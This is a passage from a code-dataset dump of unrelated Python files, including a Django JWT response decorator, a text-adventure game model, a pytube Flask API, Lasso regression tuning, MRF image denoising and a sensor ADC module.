* desc 返回json的装饰器\n * input func\n * output json内容\n \"\"\"\n def wraps(f):\n def de_ex(request, *args, **kwargs):\n try:\n # 获取token 并解析 设置用户名\n token = request.COOKIES.get('jwttoken', '')\n if not token:\n token = request.META.get('HTTP_TOKEN', '')\n if token:\n # 如果有token的话进行权限校验\n if not check_vir_permission(token):\n raise Exception('没有权限')\n # 设置用户信息\n try:\n decode_info = jwt.decode(token, verify=False)\n setattr(request, 'user_name', decode_info['username'])\n except:\n setattr(request, 'user_name', 'anonymous')\n else:\n # 没有token的时候直接报错\n raise Exception('请先进行登录操作')\n setattr(request, 'user_name', 'anonymous')\n data = f(request, *args, **kwargs)\n message = \"\"\n status = 0\n if isinstance(data, dict):\n if \"message\" in data:\n message = data[\"message\"]\n if \"status\" in data and 'status_name' not in data:\n status = data[\"status\"]\n # 错误信息的时候的返回\n data = data.get(\"data\", {})\n result = {\"status\": status, \"message\": message, \"data\": data}\n return HttpResponse(json.dumps(result), content_type=\"application/json\")\n except Exception as ex:\n logging.error(str(ex))\n data = {\"status\": 1, \"message\": str(ex), \"data\": []}\n return HttpResponse(json.dumps(data), content_type=\"application/json\")\n return de_ex\n return wraps\n\n\ndef return_file_api():\n \"\"\"\n * desc 返回file的装饰器\n * input func\n * output 文件下载\n \"\"\"\n def wraps(f):\n def de_ex(request, *args, **kwargs):\n try:\n return f(request, *args, **kwargs)\n except Exception as ex:\n logging.error(str(ex))\n data = {\"status\": 1, \"message\": str(ex), \"data\": []}\n return HttpResponse(json.dumps(data), content_type=\"application/json\")\n return de_ex\n return wraps\n\n\ndef query_params(request):\n \"\"\"\n * desc 获取get和post的请求内容\n * input request\n * output get post的参数\n \"\"\"\n data = {}\n for key in request.GET.keys():\n data[key] = request.GET[key]\n for key in request.POST.keys():\n data[key] = request.POST[key]\n if request.body:\n try:\n info = json.loads(request.body.decode('utf8'))\n except:\n info = {}\n data.update(info)\n logger.info(\"request data is %s\" % data)\n return data\n\n\ndef query_get_params(request):\n \"\"\"\n * desc 获取get的请求内容\n * input request\n * output get的参数\n \"\"\"\n data = {}\n for key in request.GET.keys():\n data[key] = request.GET[key]\n return data\n\n\ndef query_post_params(request):\n \"\"\"\n * desc 获取post的请求内容\n * input request\n * output post的参数\n \"\"\"\n data = {}\n for key in request.POST.keys():\n data[key] = request.POST[key]\n return data\n","sub_path":"python/vir_manager/utils/detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":7473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"561359025","text":"from json2html import *\nimport json\n\njsonFile = ''\nhtmlFile = ''\n\njsonFile = input(\"Enter Json File:\")\nhtmlFile = input(\"Enter HTML Output File Name:\")\n\nwith open(jsonFile, 'r') as jf_obj:\n lines = json.load(jf_obj)\n with open(htmlFile, 'a') as hf_obj:\n hf_obj.write(json2html.convert(json = lines))\n\n","sub_path":"For Linux/jsontoHTML.py","file_name":"jsontoHTML.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"397832857","text":"import json\nfrom debug import *\nfrom accessor import *\nfrom actions import ActionManager\nimport programs\nimport time\nimport image_manager\nimport file_manager\nfrom subprocess import call\nimport display\nimport scenes\nimport sys\nimport random\nrandom.seed()\n\n\"\"\"\n--------------------------\n World\n--------------------------\nContains all the places in the world, all npcs, and the player. Is basically a container.\nCan manipulate npcs and player to move around the world.\n\"\"\"\nclass World:\n def __init__(self):\n\n self.running = True\n\n # initial load world data\n world_data = get_json('world_builder')\n \n # gameobjects\n self.gameobjects = GameObject.load(world_data['gameobjects'])\n self.computers = Computer.load(world_data['computers'])\n \n # locations\n self.locations = Location.load(world_data['locations'])\n \n # player\n self.player = Player.load(world_data['player'])\n \n self.time = Time.load(world_data['time'])\n \n # load npc's and their dialogues\n self.npcs = NPC.load(world_data['npcs'], all_dialogues())\n\n # load initial actions data\n self.action_manager = ActionManager.load(all_actions())\n\n self.worldstate = \"normal\"\n\n def update(self):\n self.player.talking = \"\"\n self.player.running = \"\"\n self.player.using = \"\"\n\n if self.time.now == \"day\":\n pass\n elif self.time.now == \"night\":\n pass\n\n if self.worldstate == \"lose\":\n scenes.lose()\n self.running = False\n elif self.worldstate == \"win\":\n scenes.end()\n # done! game is removed from saves since its finished\n finish_current_game()\n quit()\n\n def get_gameobject(self,name):\n if name in self.gameobjects:\n return self.gameobjects[name]\n return False\n\n def get_computer(self,name):\n if name in self.computers:\n return self.computers[name]\n return False\n\n def get_npc(self,name):\n if name in self.npcs:\n return self.npcs[name]\n return False\n\n def get_location(self,name):\n if name in self.locations:\n return self.locations[name]\n return False\n\n def save_gameobject(self, go):\n if go.name in self.gameobjects:\n self.gameobjects[go.name] = go\n return True\n return False\n\n def save_computer(self, comp):\n if comp.name in self.computers:\n self.computers[comp.name] = comp\n return True\n return False\n\n def save_npc(self, npc):\n if npc.name in self.npcs:\n self.npcs[npc.name] = npc\n return True\n return False\n\n def save_location(self, loc):\n if loc.name in self.locations:\n self.locations[loc.name] = loc\n return True\n return False\n\n def is_comp(self, name):\n for c in self.computers:\n if c.name == name:\n return True\n return False\n\n def is_go(self, name):\n for go in self.gameobjects:\n if go.name == name:\n return True\n return False\n\n\n\"\"\"\n--------------------------\n Location\n--------------------------\nPlace in the world. In order to do certain actions, must be in a location\n\"\"\"\nclass Location:\n def __init__(self, name, desc, connections, gameobjects, computers, day_npcs, night_npcs):\n self.name = name\n self.desc = desc\n self.connections = connections\n self.gameobjects = gameobjects\n self.computers = computers\n self.day_npcs = day_npcs\n self.night_npcs = night_npcs\n\n def load(data):\n locations = {}\n for k,v in data.items():\n locations[k] = Location(\n k,\n v['desc'],\n v['connections'],\n v['gameobjects'],\n v['computers'],\n v['day_npcs'],\n v['night_npcs']\n )\n return locations\n\n def get_connections(self):\n w = get_world()\n cs = []\n for c in self.connections:\n cs.append(w.get_location(c))\n return cs\n\n def get_connection(self, con):\n if con in self.connections:\n return get_world().get_location(con)\n return False\n\n def get_gameobjects(self):\n w = get_world()\n gos = []\n for g in self.gameobjects:\n gos.append(w.get_gameobject(g))\n return gos\n\n def get_gameobject(self, go):\n if go in self.gameobjects:\n return get_world().get_gameobject(go)\n for g in self.get_gameobjects():\n if g.opened and go in g.specials['contents']:\n return get_world().get_gameobject(go)\n return False\n\n def remove_gameobject(self, go):\n r = None\n if go in self.gameobjects:\n self.gameobjects.remove(go)\n else:\n r = self.remove_from_container(go)\n return r\n\n def get_container(self, go):\n g = None\n for n in self.gameobjects:\n g = get_world().get_gameobject(n)\n if 'contents' in g.specials and go in g.specials['contents']:\n return n\n return False\n\n def remove_from_container(self, go):\n w = get_world()\n name = self.get_container(go)\n cont = w.get_gameobject(name)\n if 'contents' in cont.specials and go in cont.specials['contents']:\n w.gameobjects[name].specials['contents'].remove(go)\n save_world(w)\n return False\n\n def add_gameobject(self, go):\n if go not in self.gameobjects:\n self.gameobjects.append(go)\n return True\n return False\n\n def get_npcs(self):\n w = get_world()\n npcs = []\n it = []\n if w.time.now == \"day\":\n it = self.day_npcs\n elif w.time.now == \"night\":\n it = self.night_npcs\n\n for n in it:\n npcs.append(w.get_npc(n))\n\n return npcs\n\n def get_npc(self, name):\n if name in self.day_npcs or name in self.night_npcs:\n return get_world().get_npc(name)\n return False\n\n def get_computers(self):\n w = get_world()\n comps = []\n for c in self.computers:\n comps.append(w.get_computer(c))\n return comps\n\n def get_computer(self, name):\n if name in self.computers:\n return get_world().get_computer(name)\n return False\n\n # def move_npc(self, name, loc):\n # w = get_world()\n # loc = get_location(loc)\n # if loc:\n # self.npcs.remove(name)\n # loc.npcs.append(name)\n # w.save_location(loc)\n # w.save_location(self)\n # save_world(w)\n # return True\n # return False\n\n\"\"\"\n--------------------------\n GameObject\n--------------------------\nGameObjects are objects in the world that the player can interact with.\nIf a GameObject is picked up, then it is considered and \"item\".\nGameObjects affect what actions are avaliable to the player.\n\"\"\"\nclass GameObject:\n def __init__(self, name, desc, attrs, specials):\n self.name = name\n self.desc = desc\n self.attrs = attrs\n self.specials = specials\n self.opened = False\n\n def load(data):\n gameobjects = {}\n for k,v in data.items():\n attributes = []\n specials = {}\n\n if 'attributes' in data[k]:\n attributes = data[k]['attributes']\n if 'specials' in data[k]:\n specials = data[k]['specials']\n\n gameobjects[k] = GameObject(\n k,\n data[k]['desc'],\n attributes,\n specials\n )\n return gameobjects\n\n\"\"\"\n--------------------------\n Computer\n--------------------------\nThe main object tool the game. You can access a computer like you would access a gameobject. Once you access a computer,\nyou can types commands into it, and it will return outputs, including text and images.\n\"\"\"\nclass Computer(GameObject):\n def __init__(self, name, owner, desc, can_pick_up, data):\n super().__init__(name, desc, [], {})\n if can_pick_up:\n self.attrs.append(\"can_pick_up\")\n self.owner = owner\n self.data = data\n\n def load(data):\n computers = {}\n for k,v in data.items():\n computers[k] = Computer(\n k,\n data[k]['owner'],\n data[k]['desc'],\n data[k]['can_pick_up'],\n computer_files(k)\n )\n return computers\n\n def get_owner(self):\n w = get_world()\n if self.owner == player.name:\n return w.player\n else:\n o = w.get_npc(o)\n if o:\n return o\n return False\n\n def relative_path(self,target,raw):\n if not raw:\n if target:\n return get_world().player.computer_location + [target]\n return get_world().player.computer_location\n return target\n\n def add_file(self,path,name,contents,raw=False):\n path = self.relative_path(path,raw)\n directory = self.get_directory(path)\n if directory:\n directory[name] = contents\n return True\n return False\n\n def get_directory(self,path,raw=False):\n path = self.relative_path(path,raw)\n data = self.data\n if len(path) > 0:\n for e in path:\n if e in data:\n data = data[e]\n else:\n return False\n return data\n\n def ls(self,path,raw=False):\n directory = self.get_directory(path)\n for e in directory:\n if isinstance(directory[e],dict):\n e = str(e) + \"/\"\n print(\" \",e)\n\n # target = w.player.computer_location\n # target.append(inpt[1])\n def cd(self,path,raw=False):\n w = get_world()\n path = self.relative_path(path,raw)\n\n # can't cd into files\n if len(path) > 0 and len(path[-1].split(\".\")) > 1 and path[-1] != \"..\":\n return False\n \n data = self.data\n\n for e in path:\n if e in data:\n data = data[e]\n else:\n if e == \"..\":\n if len(path) > 2:\n self.cd(path[:-2],raw=True)\n return True\n elif len(path) == 2:\n self.cd([],raw=True)\n return True\n return False\n\n w.player.computer_location = path\n save_world(w)\n return True\n\n def open(self,path,raw=False):\n if not \".\" in path:\n return False\n \n if self.get_directory(path):\n tp = path.split(\".\")[1]\n if tp == None:\n return False\n elif tp == \"png\":\n image_manager.open_image(path)\n elif tp == \"txt\" or tp == \"email\":\n file_manager.open_text(path)\n else:\n return False\n return True\n return False\n\n def run(self, path):\n if self.get_directory(path):\n tp = path.split(\".\")[1]\n if tp == None:\n return False\n else:\n suc = programs.run(self.name, path)\n return suc\n return False\n\n def prompt_password(self):\n i = input(\"enter password: \")\n return i == get_password(self.name)\n\n def add_file(self,path,filename):\n p = self.data\n for i in path:\n p = p[i]\n p[filename] = filename\n\n\"\"\"\n--------------------------\n Player\n--------------------------\nStores all the information about the Player.\nReputation how highly reguarded you are at work.\n - If goes below 0, fired\n - Every 20 increments is a difference in position\n (promotion at 20, 40, 60, 80, etc)\nReputation also affects how other people interact with you.\n\"\"\"\nclass Player:\n def __init__(self, name, mode, computer, computer_location, location, inventory, devices, reputation):\n self.name = name\n self.mode = mode\n self.computer = computer\n self.computer_location = computer_location\n self.location = location\n self.inventory = inventory\n self.devices = devices\n self.reputation = reputation\n self.actions = []\n self.talking = None\n self.running = None\n self.using = None\n self.solved_computers = []\n\n def load(data):\n return Player(\n data['name'],\n data['mode'],\n data['computer'],\n data['computer_location'],\n data['location'],\n data['inventory'],\n data['devices'],\n data['reputation'],\n )\n\n def init_laptop(self):\n w = get_world()\n \n c = w.get_computer('laptop')\n c.owner = self.name\n w.save_computer(c)\n\n c = w.get_computer('phone')\n c.owner = self.name\n w.save_computer(c)\n\n save_world(w)\n\n def get_computer(self):\n return get_world().get_computer(self.computer)\n\n def get_current_directory(self):\n if self.computer:\n path = self.computer_location\n directory = False\n return self.get_computer().get_directory(self.computer_location)\n return False\n\n def get_location(self):\n return get_world().get_location(self.location)\n\n def get_inventory(self):\n w = get_world()\n inv = []\n for i in self.inventory:\n inv.append(w.get_gameobject(i))\n return inv\n\n def get_gameobject(self, name):\n if name in self.inventory:\n return get_world().get_gameobject(name)\n return False\n\n def get_devices(self):\n w = get_world()\n ds = []\n for d in self.devices:\n ds.append(w.get_computer(d))\n return ds\n\n def get_device(self, name):\n if name in self.devices:\n return get_world().get_computer(name)\n return False\n\n def enter_computer(self, name):\n w = get_world()\n if name in w.computers:\n self.computer = name\n self.mode = \"comp\"\n self.computer_location = []\n if not name in self.solved_computers:\n self.solved_computers.append(name)\n return self\n else:\n return False\n\n def give_item(self, i):\n if isinstance(i, GameObject):\n i = i.name\n elif isinstance(i, list):\n for j in i:\n self.give_item(j)\n return\n\n if i not in self.inventory:\n self.inventory.append(i)\n\n def complete_action(self, action):\n if not isinstance(action, str):\n action = action.name\n\n if action not in self.actions:\n self.actions.append(action)\n\n def has_items(self, itemlist):\n for i in itemlist:\n if not i in self.inventory:\n return False\n return True\n\n def has_devices(self, devicelist):\n for i in devicelist:\n if not i in self.devices:\n return False\n return True\n\n\"\"\"\n--------------------------\n NPC\n--------------------------\nNPCs are characters in the game that will interact with you in typical ways.\nNPCs will take into account your \nHowever, some NPCs will do special things and be required for certain tasks.\n\"\"\"\nclass NPC:\n def __init__(self, name, desc, dialogue):\n self.name = name\n self.desc = desc\n self.location = None\n self.dialogue = dialogue\n\n def load(data, dialogue_data):\n npcs = {}\n for k,v in data.items():\n npcs[k] = NPC(\n k,\n data[k]['desc'],\n dialogue_data[k]\n )\n return npcs\n\n def activate_dialogue(self):\n w = get_world()\n dia = \"\"\n\n if w.time.now == \"night\":\n print()\n slow_print(\"(\" + self.name + \") ...zzzzzz...\")\n print()\n return True\n\n if 'reputation' in self.dialogue:\n for r in self.dialogue['reputation']:\n if w.player.reputation >= r[0]:\n dia = random.choice(r[1])\n \n elif 'time' in self.dialogue:\n for r in self.dialogue['time']:\n if w.time.now == r[0]:\n dia = random.choice(r[1])\n \n elif 'inventory' in self.dialogue:\n for r in self.dialogue['inventory']:\n if w.player.has_items(r[0]):\n dia = random.choice(r[1])\n\n elif 'device' in self.dialogue:\n for r in self.dialogue['device']:\n if w.player.has_devices(r[0]):\n dia = random.chouce(r[1])\n \n elif 'worldstate' in self.dialogue:\n for r in self.dialogue['worldstate']:\n if w.worldstate == r[0]:\n dia = random.choice(r[1])\n \n if dia == \"\":\n dia = random.choice(self.dialogue['default'])\n\n if \"player\" in dia:\n dia = dia.replace(\"player\",w.player.name)\n\n print()\n slow_print(\"(\" + self.name + \") \" + str(dia))\n print()\n\n w.player.talking = self.name\n save_world(w)\n\n return w\n\n\"\"\"\n--------------------------\n Time\n--------------------------\nTime object that stores the current time in the world and has some useful methods\n\"\"\"\nclass Time:\n def __init__(self, now):\n self.now = now\n self.possible_times = [\"day\", \"night\"]\n\n def load(data):\n return Time(data['now'])\n\n def set_time(self, t):\n if t in self.possible_times:\n self.now = t\n return True\n else:\n return False\n\n\"\"\"\n--------------------------\n Utilities\n--------------------------\n\"\"\"\n\ndef fast_print(text):\n sys.stdout.write(str(text))\n sys.stdout.flush()\n\ndef slow_print(text,dt=0.0075,br=True):\n for i in list(text):\n time.sleep(dt)\n fast_print(i)\n time.sleep(dt)\n if br:\n lb()\n\ndef lb():\n sys.stdout.write(\"\\n\")\n sys.stdout.flush()","sub_path":"beta versions/src/beta1.3/world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":18493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"122727972","text":"from pytube import YouTube\nimport time\nfrom flask import Flask, render_template, url_for, request\nfrom flask_cors import CORS\nfrom hurry.filesize import size\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route('/api/youtube')\ndef youtube():\n url = request.args.get('url')\n if url:\n yt = YouTube(url)\n video = {\n \"info\": {\n \"title\": yt.title,\n \"author\": yt.author,\n \"thumbnail\": yt.thumbnail_url,\n \"description\": yt.description,\n \"length\": time.strftime(\"%H:%M:%S\", time.gmtime(yt.length)),\n \"views\": yt.views,\n \"publish_date\": yt.publish_date,\n \"chanel\": yt.channel_url,\n \"raiting\": yt.rating,\n \"publish_date\": yt.publish_date,\n \"js_url\": yt.js_url\n },\n \"sources\": []\n }\n videos = yt.streams.filter(progressive=True)\n for v in videos:\n video['sources'].append({\n \"url\": v.url,\n \"size\":size(v.filesize),\n \"resolution\": v.resolution\n })\n return video\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"291653438","text":"# $ python3 exercise_E.py -train SM.csv\n\nimport argparse\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import Lasso\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import KFold, cross_val_score\nfrom exercise_C import RDKit_2D_descriptors\nfrom exercise_D import calc_lnka\n\nimport optuna\n \ndef objective(trial):\n \"\"\"\n search hyper parameter based on RMSE value (5-fold CV)\n \"\"\"\t\n\n\t# Lagrange multiplier (determine weight parameter of Regularization term)\n alpha = trial.suggest_loguniform('alpha', 1e-2, 1.5)\n # the number of iteration\n max_iter = trial.suggest_int('max_iter', 1000, 100000)\n # tolerance for optimization\n tol = trial.suggest_loguniform('tol', 1e-6, 1e-4)\n\n reg = Lasso(alpha=alpha,\n max_iter=max_iter,\n tol=tol,)\n \n rmse_list = cross_val_score(reg, X, y, scoring='neg_root_mean_squared_error', cv=5, n_jobs=-1)\n # convert neg_rmse value to positive \n return - np.array(rmse_list).mean()\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"construct regression model from Small molecule data\")\n parser.add_argument(\"-train\", help=\"path to train csv data\")\n args = parser.parse_args()\n if args.train is None:\n print(parser.print_help())\n exit(1)\n\n ##### 1. data preparation #####\n\n # read .csv\n df = pd.read_csv(args.train)\n \n # make explanatory variable\n smiles = df['SMILES'].values\n # apply compute_2D_desc to each molecule\n X = np.array([RDKit_2D_descriptors(mol).compute_2D_desc() for mol in smiles])\n\n # make response variable\n # apply calc_lnka to each PPB\n y = df['PPB (fb)'].apply(calc_lnka).values\n\n # Standardization of explanatory variables\n sc = StandardScaler()\n X = sc.fit_transform(X)\n\n ##### 2. search hyper parameter using optuna #####\n study = optuna.create_study()\n study.optimize(objective, n_trials=100)\n print('Lasso Regression : Best Parameters')\n for key, value in study.best_params.items():\n \tprint(f'{key} = {value},')\n print('==================================================')\n\n\n ##### 3. output best parameters' result #####\n reg = Lasso(**study.best_params)\n # 5-fold cross validation \n kf = KFold(n_splits=5, shuffle=True, random_state=0)\n # store each RMSE value and R value\n RMSE = []\n R = []\n for tr_index, val_index in tqdm(kf.split(X, y)):\n \t# split train data and validation data\n \tX_tr, X_val = X[tr_index], X[val_index]\n \ty_tr, y_val = y[tr_index], y[val_index]\n \treg.fit(X_tr, y_tr)\n \t# validate regressor\n \ty_pr = reg.predict(X_val)\n \t# root-MSE\n \tRMSE.append(np.sqrt(mean_squared_error(y_val, y_pr)))\n \t# not diagonal element of variance-covariance matrix\n \tR.append(np.corrcoef(y_val, y_pr)[0,1])\n print('RMSE (ln(K_a))')\n print(RMSE)\n print('R (ln(K_a))')\n print(R)\n","sub_path":"exercise_E.py","file_name":"exercise_E.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"163274973","text":"from skimage import restoration # skimage's restoration submodule.\n\nplane_bilateral = restoration.denoise_bilateral(plane_rescaled)\nplane_tv_chambolle = restoration.denoise_tv_chambolle(plane_rescaled)\n\n# Checking the results.\n_, (win_left, win_center, win_right) = plt.subplots(nrows=1, ncols=3, figsize=(12, 8))\n\nsc.show_plane(win_left, plane_rescaled, title='Original')\nsc.show_plane(win_center, plane_bilateral, title='Bilateral')\nsc.show_plane(win_right, plane_tv_chambolle, title='TV Chambolle')\n","sub_path":"content/solutions/01_solutions02_restoration.py","file_name":"01_solutions02_restoration.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"583889997","text":"import requests\nfrom bs4 import BeautifulSoup\n\n#This functions will extract the token's time from the canary tokens web page\n\ndef timeLocator(x): #define function that returns the time from \n\n page_link = x\n page_response = requests.get(page_link, timeout=5)\n page_content = BeautifulSoup(page_response.content, \"html.parser\")\n most_recent_tokens = page_content.find(class_=\"details-header\", recursive=True)\n tokenString = str(most_recent_tokens)\n latest_token_date = tokenString[40:60]\n \n return(latest_token_date)\n","sub_path":"webscrapper.py","file_name":"webscrapper.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"78346449","text":"import re\nimport jieba\nfrom gensim.models import word2vec\nfrom TextCNN_code_ensemble.data_utils import seg_words, create_dict, get_labal_weight,\\\n shuffle_padding, sentence_word_to_index, get_vector_tfidf, BatchManager, get_max_len,\\\n get_weights_for_current_batch, compute_confuse_matrix\nfrom TextCNN_code_ensemble.utils import load_data_from_csv, get_tfidf_and_save, load_tfidf_dict,\\\n load_word_embedding\n\n\ntrain_data_path = \"../data/sentiment_analysis_trainingset.csv\"\ndev_data_path = \"../data/sentiment_analysis_validationset.csv\"\npath_word2vec_word_string = \"data/word2vec_word_string.txt\" # 用于训练word的word2vec的语料库\n\n\ndef get_word_data():\n train_data_df = load_data_from_csv(train_data_path)\n validate_data_df = load_data_from_csv(dev_data_path)\n content_train = train_data_df.iloc[:, 1]\n content_valid = validate_data_df.iloc[:, 1]\n string_train = seg_words(content_train, \"word\")\n string_train = \" \".join(string_train)\n string_valid = seg_words(content_valid, \"word\")\n string_valid = \" \".join(string_valid)\n string = string_train + \" \" + string_valid\n with open(path_word2vec_word_string, \"w\", encoding=\"utf-8\") as f:\n f.write(string)\n\n\ndef get_word2vec(type):\n if type == \"word\":\n sentences = word2vec.LineSentence(path_word2vec_word_string)\n model = word2vec.Word2Vec(sentences, sg=0, hs=1, min_count=1, window=4, size=100, iter=20) # CBOW\n model.save(\"data/word2vec_word_model\")\n model.wv.save_word2vec_format('data/word2vec_word_model.txt', binary=False)\n else:\n pass\n # sentences = word2vec.LineSentence(path_word2vec_char_string)\n # model = word2vec.Word2Vec(sentences, sg=0, hs=1, min_count=1, window=4, size=100, iter=20) # CBOW\n # model.save(\"data/word2vec_char_model\")\n # model.wv.save_word2vec_format('data/word2vec_char_model.txt', binary=False)\n\n\nif __name__ == \"__main__\":\n get_word_data()\n get_word2vec(\"word\")\n","sub_path":"TextCNN_code_ensemble/get_word2vec.py","file_name":"get_word2vec.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"286129752","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom collections import defaultdict\n\nimport numpy as np\nnp.random.seed(1)\nimport networkx as nx\n\nclass MRF(object):\n\n def __init__(self, input, theta=0.3, threshold=0.1):\n # 入力画像\n self.input = input\n # 入力画像のサイズ\n self.shape = self.input.shape\n\n # ノイズを含む観測値\n self.visible = nx.grid_2d_graph(self.shape[0], self.shape[1])\n\n # ノイズ除去した真の値の推測値 (潜在変数)\n self.hidden = nx.grid_2d_graph(self.shape[0], self.shape[1])\n\n for n in self.nodes():\n # 入力画像の値を 各観測値ノードの 'value' にセット\n self.visible[n]['value'] = self.input[n[0], n[1]]\n\n # 潜在変数が隣接ノードから受け取るメッセージは\n # {ノード座標 : 各値 {0, 1} をとる確率} の辞書として保存\n f = lambda: np.array([1.0, 1.0])\n self.hidden[n]['messages'] = defaultdict(f)\n\n self.theta = theta\n self.threshold = threshold\n\n def nodes(self):\n # ノードの座標を (行番号, 列番号) の tuple として返す generator\n for r in range(self.shape[0]):\n for c in range(self.shape[1]):\n yield (r, c)\n\n @property\n def denoised(self):\n \"\"\"\n ノイズ除去した画像を返す\n \"\"\"\n # 確率伝播法をループ実行 (Loopy Belief Propagation)\n for p in self.belief_propagation():\n pass\n\n # ノイズ除去後の画像\n denoised = np.copy(self.input)\n for r, c in self.nodes():\n prob = np.array([1.0, 1.0])\n messages = self.hidden[(r, c)]['messages']\n for value in messages.values():\n prob *= value\n # 周辺分布から 潜在変数の推定値を算出\n denoised[r, c] = 0 if prob[0] > prob[1] else 1\n return denoised\n\n def send_message(self, source):\n \"\"\"\n sourceで指定されたノードからから各隣接ノードへ\n メッセージを送信する\n \"\"\"\n targets = [n for n in self.hidden[source] if isinstance(n, tuple)]\n\n # 収束判定のため、前回ループ時のメッセージとの差分をとる\n diff = 0\n for target in targets:\n # source で指定されたノードの周辺分布を求める\n message = self.marginal(source, target)\n message /= np.sum(message)\n messages = self.hidden[target]['messages']\n # 前回ループ時のメッセージとの差分を加算\n diff += np.sum(np.abs(messages[source] - message))\n messages[source] = message\n # 差分の総和を返す\n return diff\n\n def marginal(self, source, target):\n \"\"\"\n source で指定されたノードの周辺確率を求める\n \"\"\"\n m = np.array([0.0, 0.0])\n for i in range(2):\n prob = self.prob(i)\n neighbors = self.hidden[source]['messages'].keys()\n # メッセージ送信先である target ノードは周辺分布の計算から除外する\n for n in [n for n in neighbors if n != target]:\n prob *= self.hidden[source]['messages'][n]\n m[i] = np.sum(prob)\n return m\n\n def belief_propagation(self, loop=20):\n # 収束判定条件\n # ここでは グラフのエッジ数 * threshold で指定された数値とした\n edges = [e for e in self.hidden.edges()]\n edges = [e for e in edges if isinstance(e[0], tuple) and isinstance(e[1], tuple)]\n threshold = self.threshold * len(edges)\n\n for n in self.nodes():\n message = self.prob(self.visible[n]['value'])\n message /= np.sum(message)\n self.hidden[n]['messages'][n] = message\n yield\n\n for i in range(loop):\n diff = 0\n for n in self.nodes():\n diff += self.send_message(n)\n yield\n\n # 収束判定\n if diff < threshold:\n break\n\n def prob(self, value):\n \"\"\"\n 周辺分布を求める\n \"\"\"\n base = np.array([1 + self.theta if value == 0 else 1 - self.theta,\n 1 + self.theta if value == 1 else 1 - self.theta])\n return base\n\n\ndef get_corrupted_input(img, corruption_level):\n \"\"\"\n ノイズを加えた画像を生成\n \"\"\"\n corrupted = np.copy(img)\n inv = np.random.binomial(n=1, p=corruption_level,\n size=img.shape)\n for r in range(img.shape[0]):\n for c in range(img.shape[1]):\n if inv[r, c]:\n corrupted[r, c] = ~(corrupted[r, c].astype(bool))\n return corrupted\n\n# MNIST データをダウンロード / ロード\nfrom sklearn.datasets import fetch_mldata\nmnist = fetch_mldata('MNIST original', data_home=\".\")\n\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfig, axes = plt.subplots(5, 3, figsize=(6, 8))\n\n# サンプルデータをスライス\ndata = mnist.data[[0, 7000, 14000, 21000, 28000]]\n\nfor i, (axrow, img) in enumerate(zip(axes, data)):\n img = img.reshape(28, 28)\n # 2値画像に変換\n img = (img >= 128).astype(int)\n\n # 5% のノイズを付与\n corrupted = get_corrupted_input(img, 0.05)\n # ノイズ付与画像からマルコフ確率場インスタンスを生成\n mrf = MRF(corrupted)\n\n if i == 0:\n axes[i][0].set_title('元画像')\n axes[i][1].set_title('ノイズ付与')\n axes[i][2].set_title('推測値')\n axes[i][0].imshow(img, cmap=cm.Greys_r)\n axes[i][1].imshow(mrf.input, cmap=cm.Greys_r)\n # MRF.denoised プロパティはノイズ除去した推測値を返す\n axes[i][2].imshow(mrf.denoised, cmap=cm.Greys_r)\n for ax in axrow:\n ax.xaxis.set_visible(False)\n ax.yaxis.set_visible(False)\nplt.show()\n","sub_path":"MRF.py","file_name":"MRF.py","file_ext":"py","file_size_in_byte":6033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"96084417","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSoftWEAR ADC module. Adds MUX features and hardware detection to normal ADC \r\ncapabilities of the underlying mraa library.\r\n\"\"\"\r\n\r\nimport mraa # Main peripheral class. Implements basic ADC \r\nimport RoboMUX as mux # SoftWEAR MUX class. \r\n\r\n# Translation between normal ADC inexes and the ones that mraa uses\r\nidx2mraa = {0:1, 1:2, 2:3, 3:4, 4:5, 5:6, 6:7}\r\n\r\n# Translation between string IDs and normal ADC indexes (to be translated to MRAA)\r\nstr2idx = {'P9_39':0, 'P9_40':1, 'P9_37':2, 'P9_38':3, \r\n 'P9_33':4, 'P9_36':5, 'P9_35':6}\r\n\r\n\r\nclass RoboADC:\r\n def __init__(self):\r\n \"\"\" Class constructor. Initialises the module with the hardware options.\r\n This includes the scan pins and the possible MUX objects.\"\"\"\r\n self._pin_objects = [] # Initialise the mraa pin object list\r\n self._mux_object = mux.RoboMUX() # Create the SoftWEAR Mux object for the ADC\r\n for pin in self.SCAN_PINS: # Go through all configured ADC pins\r\n # Validate the pin and get the mraa index associated with it.\r\n scan_idx, mraa_idx = self.validate_pin(pin)\r\n \r\n # Test for any configuration error\r\n if scan_idx is -1 or mraa_idx is -1:\r\n raise ValueError(\"Init Error: pin scan list is incorrect!\")\r\n \r\n x = mraa.Aio(mraa_idx) # Create the mraa object for the pin \r\n self._pin_objects.append(x) # Append the mraa object to the list\r\n \r\n if self.SCAN_PINS_MUX[scan_idx] is not None:\r\n # If we have a 